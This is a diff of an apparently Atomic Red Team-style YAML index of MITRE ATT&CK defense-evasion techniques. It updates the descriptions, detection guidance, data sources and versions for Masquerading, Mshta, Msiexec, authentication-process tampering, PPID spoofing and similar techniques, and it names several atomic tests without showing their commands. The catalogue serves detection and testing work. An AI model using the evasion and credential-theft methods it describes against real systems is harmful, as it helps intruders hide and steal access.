- source_name: Endgame Masquerade Ball + - source_name: Elastic Masquerade Ball description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.' url: http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf @@ -34546,31 +26999,15 @@ defense-evasion: url: https://twitter.com/ItsReallyNick/status/1055321652777619457 description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-07-09T13:54:28.727Z' - created: '2017-05-31T21:30:38.511Z' - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_detection: |- - Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect. + description: |- + Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names. - If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update) - - Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters"\u202E", "[U+202E]", and "%E2%80%AE”. - x_mitre_defense_bypassed: - - Application control by file name or path - x_mitre_data_sources: - - Process command-line parameters - - File monitoring - - Process monitoring - - Binary file metadata + Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site) + name: Masquerading + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0 + x_mitre_is_subtechnique: false + x_mitre_version: '1.4' x_mitre_contributors: - Oleg Kolesnikov, Securonix - Nick Carr, FireEye @@ -34578,8 +27015,29 @@ defense-evasion: - Felipe Espósito, @Pr0teus - Elastic - Bartosz Jerzman - x_mitre_version: '1.3' - x_mitre_is_subtechnique: false + x_mitre_data_sources: + - 'Image: Image Metadata' + - 'Command: Command Execution' + - 'Service: Service Metadata' + - 'Service: Service Creation' + - 'Scheduled Job: Scheduled Job Metadata' + - 'Scheduled Job: Scheduled Job Modification' + - 'File: File Metadata' + - 'Process: Process Metadata' + - 'File: File Modification' + x_mitre_defense_bypassed: + - Application control by file name or path + x_mitre_detection: |- + Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect. + + If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update) + + Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters"\u202E", "[U+202E]", and "%E2%80%AE”. + x_mitre_platforms: + - Linux + - macOS + - Windows + - Containers identifier: T1036 atomic_tests: - name: System File Copied to Unusual Location @@ -34596,6 +27054,15 @@ defense-evasion: name: command_prompt T1036.005: technique: + id: attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2 + description: |- + Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous. + + Adversaries may also use the same icon of the file they are trying to mimic. + name: Match Legitimate Name or Location + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1036.005 @@ -34603,7 +27070,7 @@ defense-evasion: - external_id: CAPEC-177 source_name: capec url: https://capec.mitre.org/data/definitions/177.html - - source_name: Endgame Masquerade Ball + - source_name: Elastic Masquerade Ball description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.' url: http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf @@ -34611,38 +27078,37 @@ defense-evasion: url: https://twitter.com/ItsReallyNick/status/1055321652777619457 description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Match Legitimate Name or Location - description: |- - Adversaries may match or approximate the name or location of legitimate files when naming/placing their files. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. - - Adversaries may also use the same icon of the file they are trying to mimic. - id: attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2 + - source_name: Docker Images + url: https://docs.docker.com/engine/reference/commandline/images/ + description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021. type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:11:45.970Z' + modified: '2021-04-20T19:23:37.762Z' created: '2020-02-10T20:43:10.239Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_defense_bypassed: - - Application control by file name or path - x_mitre_detection: |- - Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect. - - If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update) - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Binary file metadata x_mitre_platforms: - Linux - macOS - Windows + - Containers + x_mitre_data_sources: + - 'Image: Image Metadata' + - 'File: File Metadata' + - 'Process: Process Metadata' + x_mitre_detection: |- + Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect. + + If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update) + + In containerized environments, use image IDs and layer hashes to compare images instead of relying only on their names.(Citation: Docker Images) Monitor for the unexpected creation of new resources within your cluster in Kubernetes, especially those created by atypical users. + x_mitre_defense_bypassed: + - Application control by file name or path + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + x_mitre_contributors: + - Yossi Weizman, Azure Defender Research Team + - Vishwas Manral, McAfee atomic_tests: [] T1556: technique: @@ -34658,6 +27124,10 @@ defense-evasion: description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019. url: https://www.secureworks.com/research/skeleton-key-malware-analysis + - source_name: Xorrior Authorization Plugins + url: https://xorrior.com/persistent-credential-theft/ + description: Chris Ross. (2018, October 17). Persistent Credential Theft with + Authorization Plugins. Retrieved April 22, 2021. - url: https://technet.microsoft.com/en-us/library/dn487457.aspx description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. @@ -34666,18 +27136,10 @@ defense-evasion: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Modify Authentication Process - description: "Adversaries may modify authentication mechanisms and processes - to access user credentials or enable otherwise unwarranted access to accounts. - The authentication process is handled by mechanisms, such as the Local Security - Authentication Server (LSASS) process and the Security Accounts Manager (SAM) - on Windows or pluggable authentication modules (PAM) on Unix-based systems, - responsible for gathering, storing, and validating credentials. \n\nAdversaries - may maliciously modify a part of this process to either reveal credentials - or bypass authentication mechanisms. Compromised credentials or access may - be used to bypass access controls placed on various resources on systems within - the network and may even be used for persistent access to remote systems and - externally available services, such as VPNs, Outlook Web Access and remote - desktop. " + description: |- + Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078). + + Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. id: attack-pattern--f4c1826f-a322-41cd-9557-562100848c84 type: attack-pattern kill_chain_phases: @@ -34685,15 +27147,20 @@ defense-evasion: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-21T02:41:11.743Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-26T20:08:31.712Z' created: '2020-02-11T19:01:56.887Z' + x_mitre_contributors: + - Chris Ross @xorrior x_mitre_data_sources: - - File monitoring - - Authentication logs - - API monitoring - - Windows Registry - - Process monitoring - - DLL monitoring + - 'Logon Session: Logon Session Creation' + - 'Process: OS API Execution' + - 'Process: Process Access' + - 'File: File Modification' + - 'File: File Creation' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_detection: "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification @@ -34705,18 +27172,20 @@ defense-evasion: exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools - such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nConfigure - robust, consistent account activity audit policies across the enterprise and - with externally accessible services. (Citation: TechNet Audit Policy) Look - for suspicious account behavior across systems that share accounts, either - user, admin, or service accounts. Examples: one account logged into multiple - systems simultaneously; multiple accounts logged into the same machine simultaneously; - accounts logged in at odd times or outside of business hours. Activity may - be from interactive login sessions or process ownership from accounts being - used to execute binaries on a remote system as a particular account. Correlate - other security systems with login information (e.g., a user has an active - login session but has not entered the building or does not have VPN access)." - x_mitre_version: '1.1' + such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nMonitor + for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: + Xorrior Authorization Plugins)\n\nConfigure robust, consistent account activity + audit policies across the enterprise and with externally accessible services. + (Citation: TechNet Audit Policy) Look for suspicious account behavior across + systems that share accounts, either user, admin, or service accounts. Examples: + one account logged into multiple systems simultaneously; multiple accounts + logged into the same machine simultaneously; accounts logged in at odd times + or outside of business hours. Activity may be from interactive login sessions + or process ownership from accounts being used to execute binaries on a remote + system as a particular account. Correlate other security systems with login + information (e.g., a user has an active login session but has not entered + the building or does not have VPN access)." + x_mitre_version: '2.0' x_mitre_is_subtechnique: false x_mitre_platforms: - Windows @@ -34747,7 +27216,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-09-14T19:55:23.798Z' + modified: '2021-04-20T14:51:01.759Z' created: '2019-08-30T18:03:05.864Z' x_mitre_detection: Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such @@ -34758,18 +27227,23 @@ defense-evasion: by the cloud provider, to help distinguish valid, expected actions from malicious ones. x_mitre_data_sources: - - Stackdriver logs - - GCP audit logs - - Azure activity logs - - AWS CloudTrail logs + - 'Instance: Instance Stop' + - 'Instance: Instance Start' + - 'Instance: Instance Creation' + - 'Instance: Instance Modification' + - 'Instance: Instance Deletion' + - 'Snapshot: Snapshot Creation' + - 'Snapshot: Snapshot Modification' + - 'Snapshot: Snapshot Deletion' + - 'Volume: Volume Creation' + - 'Volume: Volume Modification' + - 'Volume: Volume Deletion' x_mitre_is_subtechnique: false - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_permissions_required: - User x_mitre_platforms: - - AWS - - GCP - - Azure + - IaaS atomic_tests: [] T1112: technique: @@ -34842,11 +27316,12 @@ defense-evasion: x_mitre_defense_bypassed: - Host forensic analysis x_mitre_data_sources: - - Windows Registry - - File monitoring - - Process monitoring - - Process command-line parameters - - Windows event logs + - 'Process: Process Creation' + - 'Process: OS API Execution' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Windows Registry: Windows Registry Key Deletion' x_mitre_contributors: - Bartosz Jerzman - Travis Smith, Tripwire @@ -35033,15 +27508,57 @@ defense-evasion: for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)" x_mitre_data_sources: - - Network device run-time memory - - Network device configuration - - File monitoring + - 'File: File Modification' x_mitre_platforms: - Network atomic_tests: [] T1218.005: technique: - id: attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade + created: '2020-01-23T19:32:49.557Z' + modified: '2020-12-30T14:29:06.462Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1218.005 + url: https://attack.mitre.org/techniques/T1218/005 + - source_name: Cylance Dust Storm + description: Gross, J. (2016, February 23). Operation Dust Storm. Retrieved + September 19, 2017. + url: https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf + - source_name: Red Canary HTA Abuse Part Deux + description: McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) + Abuse, Part Deux. Retrieved October 27, 2017. + url: https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/ + - url: https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html + description: 'Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. + (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. + Retrieved October 27, 2017.' + source_name: FireEye Attacks Leveraging HTA + - description: Dove, A. (2016, March 23). Fileless Malware – A Behavioural Analysis + Of Kovter Persistence. Retrieved December 5, 2017. + source_name: Airbus Security Kovter Analysis + url: https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/ + - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html + description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing + LNK. Retrieved April 24, 2017. + source_name: FireEye FIN7 April 2017 + - source_name: Wikipedia HTML Application + description: Wikipedia. (2017, October 14). HTML Application. Retrieved October + 27, 2017. + url: https://en.wikipedia.org/wiki/HTML_Application + - source_name: MSDN HTML Applications + description: Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017. + url: https://msdn.microsoft.com/library/ms536471.aspx + - source_name: LOLBAS Mshta + url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/ + description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Mshta description: "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during @@ -35058,71 +27575,28 @@ defense-evasion: its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)" - name: Mshta - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1218.005 - url: https://attack.mitre.org/techniques/T1218/005 - - source_name: Cylance Dust Storm - description: Gross, J. (2016, February 23). Operation Dust Storm. Retrieved - September 19, 2017. - url: https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf - - source_name: Red Canary HTA Abuse Part Deux - description: McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) - Abuse, Part Deux. Retrieved October 27, 2017. - url: https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/ - - source_name: FireEye Attacks Leveraging HTA - description: 'Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. - (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. - Retrieved October 27, 2017.' - url: https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html - - description: Dove, A. (2016, March 23). Fileless Malware – A Behavioural Analysis - Of Kovter Persistence. Retrieved December 5, 2017. - source_name: Airbus Security Kovter Analysis - url: https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/ - - source_name: FireEye FIN7 April 2017 - description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing - LNK. Retrieved April 24, 2017. - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html - - source_name: Wikipedia HTML Application - description: Wikipedia. (2017, October 14). HTML Application. Retrieved October - 27, 2017. - url: https://en.wikipedia.org/wiki/HTML_Application - - source_name: MSDN HTML Applications - description: Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017. - url: https://msdn.microsoft.com/library/ms536471.aspx - - source_name: LOLBAS Mshta - url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/ - description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-06-20T22:35:27.613Z' - created: '2020-01-23T19:32:49.557Z' - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank - - Ricardo Dias - x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring + id: attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_defense_bypassed: + - Application control + - Digital Certificate Validation x_mitre_detection: |- Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed. Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious - x_mitre_defense_bypassed: - - Application control - - Digital Certificate Validation - x_mitre_permissions_required: - - User - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_data_sources: + - 'Process: Process Creation' + - 'File: File Creation' + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' + x_mitre_contributors: + - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank + - Ricardo Dias + x_mitre_platforms: + - Windows identifier: T1218.005 atomic_tests: - name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject @@ -35375,17 +27849,11 @@ defense-evasion: name: powershell T1218.007: technique: - created: '2020-01-24T14:38:49.266Z' - modified: '2020-06-20T22:38:14.154Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern id: attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336 description: |- Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft. - Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. + Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018) name: Msiexec created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: @@ -35405,6 +27873,18 @@ defense-evasion: url: https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/ description: Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019. + - source_name: Microsoft AlwaysInstallElevated 2018 + url: https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated + description: Microsoft. (2018, May 31). AlwaysInstallElevated. Retrieved December + 14, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-12-14T18:40:45.170Z' + created: '2020-01-24T14:38:49.266Z' + x_mitre_contributors: + - Alexandros Pappas x_mitre_platforms: - Windows x_mitre_detection: Use process monitoring to monitor the execution and arguments @@ -35419,11 +27899,12 @@ defense-evasion: x_mitre_permissions_required: - User x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_data_sources: - - DLL monitoring - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' identifier: T1218.007 atomic_tests: - name: Msiexec.exe - Execute Local MSI file @@ -35578,9 +28059,10 @@ defense-evasion: The Streams tool of Sysinternals can be used to uncover files with ADSs. The dir /r command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a -stream parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014) x_mitre_data_sources: - - Process command-line parameters - - API monitoring - - File monitoring + - 'Process: OS API Execution' + - 'File: File Metadata' + - 'File: File Modification' + - 'Command: Command Execution' x_mitre_platforms: - Windows identifier: T1564.004 @@ -35748,8 +28230,8 @@ defense-evasion: x_mitre_platforms: - Network x_mitre_data_sources: - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_detection: |- Consider monitoring network traffic on both interfaces of border network devices. Compare packets transmitted by the device between networks to look for signs of NAT being implemented. Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3. In some cases, Port Address Translation (PAT) may also be used by an adversary. @@ -35785,8 +28267,8 @@ defense-evasion: x_mitre_platforms: - Network x_mitre_data_sources: - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_detection: |- Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question. Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device. @@ -35832,9 +28314,11 @@ defense-evasion: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-21T02:41:11.550Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:11:00.356Z' created: '2020-10-19T17:58:04.155Z' - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator @@ -35843,7 +28327,7 @@ defense-evasion: Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). x_mitre_data_sources: - - File monitoring + - 'File: File Modification' x_mitre_platforms: - Network atomic_tests: [] @@ -35861,9 +28345,9 @@ defense-evasion: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Network Share Connection Removal description: 'Adversaries may remove share connections that are no longer useful - in order to clean up traces of their operation. Windows shared drive and [Windows - Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be - removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) + in order to clean up traces of their operation. Windows shared drive and [SMB/Windows + Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can + be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\system\share /delete command. (Citation: Technet Net Use)' @@ -35872,7 +28356,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-01-31T12:39:18.816Z' + modified: '2021-02-09T13:31:01.970Z' created: '2020-01-31T12:39:18.816Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: true @@ -35895,10 +28379,10 @@ defense-evasion: account, and can be used to correlate network share activity to other events to investigate potentially malicious activity. x_mitre_data_sources: - - Authentication logs - - Packet capture - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Network Traffic: Network Traffic Content' + - 'User Account: User Account Authentication' x_mitre_platforms: - Windows identifier: T1070.005 @@ -36029,7 +28513,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-09-16T19:24:20.601Z' + modified: '2021-04-24T13:19:18.594Z' created: '2017-05-31T21:30:32.662Z' x_mitre_is_subtechnique: false x_mitre_version: '1.1' @@ -36037,18 +28521,12 @@ defense-evasion: - Red Canary - Christiaan Beek, @ChristiaanBeek x_mitre_data_sources: - - Network protocol analysis - - Process use of network - - File monitoring - - Malware reverse engineering - - Binary file metadata - - Process command-line parameters - - Environment variable - - Process monitoring - - Windows event logs - - Network intrusion detection system - - Email gateway - - SSL/TLS inspection + - 'File: File Content' + - 'File: File Metadata' + - 'File: File Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Command: Command Execution' x_mitre_defense_bypassed: - Host forensic analysis - Signature-based detection @@ -36241,9 +28719,9 @@ defense-evasion: x_mitre_platforms: - Windows x_mitre_data_sources: - - Loaded DLLs - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Command: Command Execution' x_mitre_detection: Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially @@ -36329,7 +28807,7 @@ defense-evasion: description: |- Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018) - Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) + Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) Explicitly 